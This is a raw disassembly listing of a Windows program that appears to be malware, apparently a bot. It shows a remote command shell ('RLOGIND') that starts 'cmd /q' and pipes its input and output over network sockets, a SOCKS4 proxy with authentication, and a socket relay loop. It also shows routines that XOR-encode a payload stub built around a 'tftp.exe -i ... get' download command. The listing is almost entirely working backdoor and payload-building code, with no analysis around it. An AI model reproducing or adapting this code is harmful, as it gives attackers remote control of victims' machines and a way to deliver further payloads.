call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F023 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F07B proc near ; CODE XREF: sub_40F2F9+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_58]
rep stosd
lea edi, [ebp+var_14]
stosd
xor esi, esi
stosd
stosd
stosd
mov eax, [ebp+arg_0]
mov edi, ds:dword_41F0B4
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_4], esi
mov [ebp+var_58], 44h
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_41F0E8 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_41F030 ; CreateProcessA
test eax, eax
jz short loc_40F12B
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_434340[eax], ecx
call ds:dword_41F034 ; CloseHandle
jmp short loc_40F141
; ---------------------------------------------------------------------------
loc_40F12B: ; CODE XREF: sub_40F07B+8E�j
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_401CA7
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_40F141: ; CODE XREF: sub_40F07B+AE�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_40F07B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F147 proc near ; DATA XREF: sub_40F3F5+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, ds:dword_41F058
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_40F1A9
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F147+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_40F192
loc_40F16B: ; CODE XREF: sub_40F147+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_40F182
cmp dl, 0Dh
jz short loc_40F182
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_40F182: ; CODE XREF: sub_40F147+2B�j
; sub_40F147+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_40F16B
loc_40F192: ; CODE XREF: sub_40F147+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_433534 ; send
test eax, eax
jle short loc_40F1C0
loc_40F1A9: ; CODE XREF: sub_40F147+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx ; ReadFile
test eax, eax
jnz short loc_40F160
loc_40F1C0: ; CODE XREF: sub_40F147+60�j
mov esi, ds:dword_41F008
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_40F1DC
call esi ; RtlGetLastWin32Error
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_401CA7
pop ecx
pop ecx
loc_40F1DC: ; CODE XREF: sub_40F147+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_40F147 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F1E4 proc near ; DATA XREF: sub_40F3F5+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_40F2D6
; ---------------------------------------------------------------------------
loc_40F201: ; CODE XREF: sub_40F1E4+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_40F20E
dec [ebp+74h+var_10]
jmp loc_40F2D9
; ---------------------------------------------------------------------------
loc_40F20E: ; CODE XREF: sub_40F1E4+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_40F2C1
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_40F278
cmp al, 7Fh
jz short loc_40F278
cmp al, 3
jnz short loc_40F239
push ebx
push ebx
call ds:dword_41F100 ; GenerateConsoleCtrlEvent
jmp short loc_40F29F
; ---------------------------------------------------------------------------
loc_40F239: ; CODE XREF: sub_40F1E4+49�j
cmp al, 15h
jnz short loc_40F25B
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_40F28B
; ---------------------------------------------------------------------------
loc_40F25B: ; CODE XREF: sub_40F1E4+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_40F28C
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_40F28B
; ---------------------------------------------------------------------------
loc_40F278: ; CODE XREF: sub_40F1E4+41�j
; sub_40F1E4+45�j
cmp esi, ebx
jbe short loc_40F2A2
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_40F28B: ; CODE XREF: sub_40F1E4+75�j
; sub_40F1E4+92�j
pop ecx
loc_40F28C: ; CODE XREF: sub_40F1E4+84�j
push ebx
push ecx
lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_433534 ; send
test eax, eax
jle short loc_40F2F1
loc_40F29F: ; CODE XREF: sub_40F1E4+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_40F2A2: ; CODE XREF: sub_40F1E4+96�j
cmp al, 0Dh
jnz short loc_40F2D9
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call ds:dword_41F038 ; WriteFile
test eax, eax
jz short loc_40F2F1
xor esi, esi
jmp short loc_40F2D9
; ---------------------------------------------------------------------------
loc_40F2C1: ; CODE XREF: sub_40F1E4+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_40F2CF
mov [ebp+74h+var_C], 1
jmp short loc_40F2D9
; ---------------------------------------------------------------------------
loc_40F2CF: ; CODE XREF: sub_40F1E4+E0�j
mov [ebp+74h+var_10], 0Ah
loc_40F2D6: ; CODE XREF: sub_40F1E4+18�j
mov [ebp+74h+var_C], ebx
loc_40F2D9: ; CODE XREF: sub_40F1E4+25�j
; sub_40F1E4+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_433414 ; recv
test eax, eax
jg loc_40F201
loc_40F2F1: ; CODE XREF: sub_40F1E4+B9�j
; sub_40F1E4+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_40F1E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F2F9 proc near ; CODE XREF: sub_40F3F5+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_41344D
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_40F31E
xor eax, eax
jmp loc_40F3F1
; ---------------------------------------------------------------------------
loc_40F31E: ; CODE XREF: sub_40F2F9+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ds:dword_41F0EC ; CreatePipe
test eax, eax
mov edi, ds:dword_41F034
jnz short loc_40F35F
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_40F380
; ---------------------------------------------------------------------------
loc_40F35F: ; CODE XREF: sub_40F2F9+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call ds:dword_41F0EC ; CreatePipe
test eax, eax
jnz short loc_40F388
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_40F380: ; CODE XREF: sub_40F2F9+64�j
call sub_401CA7
pop ecx
jmp short loc_40F3B5
; ---------------------------------------------------------------------------
loc_40F388: ; CODE XREF: sub_40F2F9+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_40F07B
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_40F3EA
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_401C33
loc_40F3B5: ; CODE XREF: sub_40F2F9+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_40F3C1
push [ebp+var_4]
call edi ; CloseHandle
loc_40F3C1: ; CODE XREF: sub_40F2F9+C1�j
cmp [ebp+var_8], 0
jz short loc_40F3CC
push [ebp+var_8]
call edi ; CloseHandle
loc_40F3CC: ; CODE XREF: sub_40F2F9+CC�j
mov eax, [esi]
test eax, eax
jz short loc_40F3D5
push eax
call edi ; CloseHandle
loc_40F3D5: ; CODE XREF: sub_40F2F9+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_40F3DF
push eax
call edi ; CloseHandle
loc_40F3DF: ; CODE XREF: sub_40F2F9+E1�j
push esi
call sub_412FE4
pop ecx
xor eax, eax
jmp short loc_40F3F0
; ---------------------------------------------------------------------------
loc_40F3EA: ; CODE XREF: sub_40F2F9+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_40F3F0: ; CODE XREF: sub_40F2F9+EF�j
pop ebx
loc_40F3F1: ; CODE XREF: sub_40F2F9+20�j
pop edi
pop esi
leave
retn
sub_40F2F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3F5 proc near ; CODE XREF: sub_40E00D+1BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_40F2F9
imul edi, 234h
mov esi, eax
mov eax, dword_434344[edi]
mov edi, ds:dword_41F00C
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_40F147
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_40F464
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401CA7
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_40F544
; ---------------------------------------------------------------------------
loc_40F464: ; CODE XREF: sub_40F3F5+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_40F1E4
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_40F4A5
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401CA7
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_41F0C8 ; TerminateThread
xor eax, eax
jmp loc_40F545
; ---------------------------------------------------------------------------
loc_40F4A5: ; CODE XREF: sub_40F3F5+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call ds:dword_41F104 ; WaitForMultipleObjects
sub eax, ebx
jz short loc_40F4FF
dec eax
jz short loc_40F4F9
dec eax
jz short loc_40F4E5
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_401CA7
pop ecx
pop ecx
jmp short loc_40F514
; ---------------------------------------------------------------------------
loc_40F4E5: ; CODE XREF: sub_40F3F5+D9�j
mov edi, ds:dword_41F0C8
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_40F514
; ---------------------------------------------------------------------------
loc_40F4F9: ; CODE XREF: sub_40F3F5+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_40F503
; ---------------------------------------------------------------------------
loc_40F4FF: ; CODE XREF: sub_40F3F5+D3�j
push ebx
push dword ptr [esi+14h]
loc_40F503: ; CODE XREF: sub_40F3F5+108�j
call ds:dword_41F0C8 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_41F0BC ; TerminateProcess
loc_40F514: ; CODE XREF: sub_40F3F5+EE�j
; sub_40F3F5+102�j
push dword ptr [esi+10h]
mov edi, ds:dword_41F034
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_4335AC ; closesocket
push esi
call sub_412FE4
xor eax, eax
inc eax
loc_40F544: ; CODE XREF: sub_40F3F5+6A�j
pop ecx
loc_40F545: ; CODE XREF: sub_40F3F5+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_40F3F5 endp
; =============== S U B R O U T I N E =======================================
sub_40F54A proc near ; CODE XREF: sub_40F576+A�p
; sub_40F779+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
lea edx, [eax+1]
loc_40F551: ; CODE XREF: sub_40F54A+C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F551
sub eax, edx
push esi
mov esi, eax
mov eax, [esp+4+arg_4]
lea ecx, [eax+1]
loc_40F564: ; CODE XREF: sub_40F54A+1F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40F564
sub eax, ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_40F54A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F576 proc near ; CODE XREF: sub_40F790+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40F54A
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40F593
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40F593: ; CODE XREF: sub_40F576+17�j
mov eax, [ebp+arg_8]
lea edx, [eax+1]
loc_40F599: ; CODE XREF: sub_40F576+28�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F599
sub eax, edx
push ebx
mov edx, eax
mov eax, [ebp+arg_C]
push esi
push edi
mov [ebp+arg_4], edx
lea esi, [eax+1]
loc_40F5B0: ; CODE XREF: sub_40F576+3F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F5B0
sub eax, esi
mov ebx, [ebp+arg_0]
lea ecx, [eax+edx+12h]
mov dword_42B3A4, ecx
push 0FFFFFFEDh
lea ecx, [eax+1]
mov dword_42B3C5, ecx
lea ecx, [eax+17h]
mov dword_42B3BD, ecx
pop ecx
sub ecx, eax
mov dword_42B3D3, ecx
push 1Dh
pop ecx
mov edi, ebx
mov esi, offset dword_42B340
rep movsd
mov esi, [ebp+arg_8]
mov ecx, edx
shr ecx, 2
lea edi, [ebx+74h]
rep movsd
mov ecx, edx
mov edx, [ebp+arg_4]
and ecx, 3
rep movsb
add edx, 74h
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+0Ch)
movsd
movsb
mov esi, [ebp+arg_C]
add edx, 5
lea edi, [edx+ebx]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
mov ebx, [ebp+arg_0]
and ecx, 3
rep movsb
add edx, eax
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+11h)
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_C]
add edx, 10h
mov ecx, eax
lea edi, [edx+ebx]
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
push 0Eh
lea edi, [edx+eax]
add edi, [ebp+arg_0]
mov eax, [ebp+var_4]
pop ecx
mov esi, offset byte_42B3C9
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_40F576 endp
; =============== S U B R O U T I N E =======================================
sub_40F66E proc near ; CODE XREF: sub_40F689+41�p
; sub_40F779+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40F677
inc ecx
loc_40F677: ; CODE XREF: sub_40F66E+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40F66E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F689 proc near ; CODE XREF: sub_40F790+56�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
cmp bl, 0Ah
push esi
jz short loc_40F6A4
cmp bl, 0Dh
jz short loc_40F6A4
cmp bl, 5Ch
jz short loc_40F6A4
test bl, bl
jnz short loc_40F6A5
loc_40F6A4: ; CODE XREF: sub_40F689+B�j
; sub_40F689+10�j ...
inc ebx
loc_40F6A5: ; CODE XREF: sub_40F689+19�j
mov esi, 0FFh
cmp ebx, esi
jbe short loc_40F6C9
mov eax, ebx
shr eax, 8
cmp al, 0Ah
jz short loc_40F6C3
cmp al, 0Dh
jz short loc_40F6C3
cmp al, 5Ch
jz short loc_40F6C3
test al, al
jnz short loc_40F6C9
loc_40F6C3: ; CODE XREF: sub_40F689+2C�j
; sub_40F689+30�j ...
add ebx, 100h
loc_40F6C9: ; CODE XREF: sub_40F689+23�j
; sub_40F689+38�j
push ebx
call sub_40F66E
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+arg_C], eax
ja short loc_40F6DF
cmp eax, 0FFFFh
jbe short loc_40F6E6
loc_40F6DF: ; CODE XREF: sub_40F689+4D�j
xor eax, eax
jmp loc_40F775
; ---------------------------------------------------------------------------
loc_40F6E6: ; CODE XREF: sub_40F689+54�j
mov dl, byte_479E18
xor eax, eax
test ebx, ebx
jbe short loc_40F714
loc_40F6F2: ; CODE XREF: sub_40F689+89�j
mov ecx, [ebp+arg_8]
mov cl, [eax+ecx]
xor cl, dl
jz short loc_40F70B
cmp cl, 0Ah
jz short loc_40F70B
cmp cl, 0Dh
jz short loc_40F70B
cmp cl, 5Ch
jnz short loc_40F70F
loc_40F70B: ; CODE XREF: sub_40F689+71�j
; sub_40F689+76�j ...
inc dl
xor eax, eax
loc_40F70F: ; CODE XREF: sub_40F689+80�j
inc eax
cmp eax, ebx
jb short loc_40F6F2
loc_40F714: ; CODE XREF: sub_40F689+67�j
cmp ebx, esi
push edi
mov edi, [ebp+arg_0]
push 5
mov byte_479E18, dl
pop ecx
ja short loc_40F73C
mov esi, offset loc_42B328
mov byte_42B335, bl
mov byte_42B339, dl
rep movsd
push 15h
jmp short loc_40F754
; ---------------------------------------------------------------------------
loc_40F73C: ; CODE XREF: sub_40F689+9A�j
mov word_42B31E, bx
mov byte_42B323, dl
mov esi, offset loc_42B310
rep movsd
movsw
push 17h
loc_40F754: ; CODE XREF: sub_40F689+B1�j
pop eax
xor ecx, ecx
test ebx, ebx
movsb
pop edi
jbe short loc_40F772
mov esi, [ebp+arg_0]
add esi, eax
loc_40F762: ; CODE XREF: sub_40F689+E7�j
mov eax, [ebp+arg_8]
mov al, [ecx+eax]
xor al, dl
mov [esi+ecx], al
inc ecx
cmp ecx, ebx
jb short loc_40F762
loc_40F772: ; CODE XREF: sub_40F689+D2�j
mov eax, [ebp+arg_C]
loc_40F775: ; CODE XREF: sub_40F689+58�j
pop esi
pop ebx
pop ebp
retn
sub_40F689 endp
; =============== S U B R O U T I N E =======================================
sub_40F779 proc near ; CODE XREF: sub_40F790+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40F54A
push eax
call sub_40F66E
add esp, 0Ch
retn
sub_40F779 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F790 proc near ; CODE XREF: sub_411235+6D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_40F779
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_40F7B0
cmp eax, 0FFFFh
jbe short loc_40F7B4
loc_40F7B0: ; CODE XREF: sub_40F790+17�j
xor eax, eax
jmp short loc_40F7F9
; ---------------------------------------------------------------------------
loc_40F7B4: ; CODE XREF: sub_40F790+1E�j
push esi
push edi
push ebx
call sub_40F54A
add eax, 101h
push eax
call sub_41344D
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_40F54A
pop ecx
pop ecx
push eax
push esi
call sub_40F576
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F689
push esi
mov edi, eax
call sub_412FE4
add esp, 24h
mov eax, edi
pop esi
loc_40F7F9: ; CODE XREF: sub_40F790+22�j
pop edi
pop ebx
pop ebp
retn
sub_40F790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F7FD proc near ; CODE XREF: sub_40F8FA+200�p
var_504 = byte ptr -504h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 504h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 400h
loc_40F810: ; CODE XREF: sub_40F7FD+C0�j
; sub_40F7FD+F2�j
mov eax, [ebp+arg_4]
xor ecx, ecx
inc ecx
mov [ebp+var_100], eax
mov [ebp+var_104], ecx
xor eax, eax
loc_40F824: ; CODE XREF: sub_40F7FD+36�j
mov edx, [ebp+arg_0]
cmp [ebp+eax*4+var_100], edx
jz short loc_40F835
inc eax
cmp eax, ecx
jb short loc_40F824
loc_40F835: ; CODE XREF: sub_40F7FD+31�j
cmp eax, ecx
jnz short loc_40F849
mov [ebp+var_FC], edx
mov [ebp+var_104], 2
loc_40F849: ; CODE XREF: sub_40F7FD+3A�j
push ebx
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+var_504]
rep stosd
push ebx
lea eax, [ebp+var_104]
push eax
push ebx
call dword_433544 ; select
lea eax, [ebp+var_104]
push eax
push [ebp+arg_4]
call dword_4334F4 ; __WSAFDIsSet
test eax, eax
jz short loc_40F8AB
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_433414 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F8F5
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40F8F5
loc_40F8AB: ; CODE XREF: sub_40F7FD+7E�j
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call dword_4334F4 ; __WSAFDIsSet
test eax, eax
jz loc_40F810
push ebx
push esi
lea eax, [ebp+var_504]
push eax
push [ebp+arg_0]
call dword_433414 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F8F5
push ebx
push eax
lea eax, [ebp+var_504]
push eax
push [ebp+arg_4]
call dword_433534 ; send
cmp eax, 0FFFFFFFFh
jnz loc_40F810
loc_40F8F5: ; CODE XREF: sub_40F7FD+95�j
; sub_40F7FD+AC�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40F7FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40F8FA proc near ; DATA XREF: sub_40FB2A+13F�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_4D4 = byte ptr -4D4h
var_4D3 = byte ptr -4D3h
var_4D2 = word ptr -4D2h
var_4D0 = dword ptr -4D0h
var_4CC = byte ptr -4CCh
var_CC = byte ptr -0CCh
var_48 = byte ptr -48h
var_30 = dword ptr -30h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 5D8h
mov edx, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 2Ch
pop ecx
mov esi, edx
lea edi, [ebp+74h+var_CC]
rep movsd
mov edi, [ebp+74h+var_30]
xor eax, eax
inc eax
mov [edx+0ACh], eax
mov esi, edi
mov [ebp+74h+var_5D8], eax
imul esi, 234h
mov ecx, dword_434344[esi]
xor ebx, ebx
lea eax, [ebp+74h+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+74h+var_5D8]
push eax
push ebx
mov [ebp+74h+arg_0], edi
mov [ebp+74h+var_C], 5
mov [ebp+74h+var_8], ebx
mov [ebp+74h+var_5D4], ecx
call dword_433544 ; select
test eax, eax
jnz short loc_40F96D
push dword_434344[esi]
jmp loc_40FB15
; ---------------------------------------------------------------------------
loc_40F96D: ; CODE XREF: sub_40F8FA+66�j
push ebx
push 408h
lea eax, [ebp+74h+var_4D4]
push eax
push dword_434344[esi]
call dword_433414 ; recv
test eax, eax
jle loc_40FB0F
cmp [ebp+74h+var_4D4], 4
jnz loc_40FB0F
cmp [ebp+74h+var_4D3], 1
jnz loc_40FB0F
cmp [ebp+74h+var_48], bl
jz loc_40FA43
lea eax, [ebp+74h+var_48]
lea edi, [ebp+74h+var_4CC]
loc_40F9BA: ; CODE XREF: sub_40F8FA+DC�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_40F9DC
cmp cl, bl
jz short loc_40F9D8
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_40F9DC
inc edi
inc edi
inc eax
inc eax
cmp cl, bl
jnz short loc_40F9BA
loc_40F9D8: ; CODE XREF: sub_40F8FA+CA�j
xor eax, eax
jmp short loc_40F9E1
; ---------------------------------------------------------------------------
loc_40F9DC: ; CODE XREF: sub_40F8FA+C6�j
; sub_40F8FA+D4�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F9E1: ; CODE XREF: sub_40F8FA+E0�j
cmp eax, ebx
jz short loc_40FA43
lea eax, [ebp+74h+var_48]
push eax
lea eax, [ebp+74h+var_4CC]
push eax
push offset aSocks4Authenti ; "[SOCKS4]: Authentication failed. Remote"...
call sub_401CA7
add esp, 0Ch
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Dh
loc_40FA0A: ; CODE XREF: sub_40F8FA+1C0�j
xor eax, eax
push ebx
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
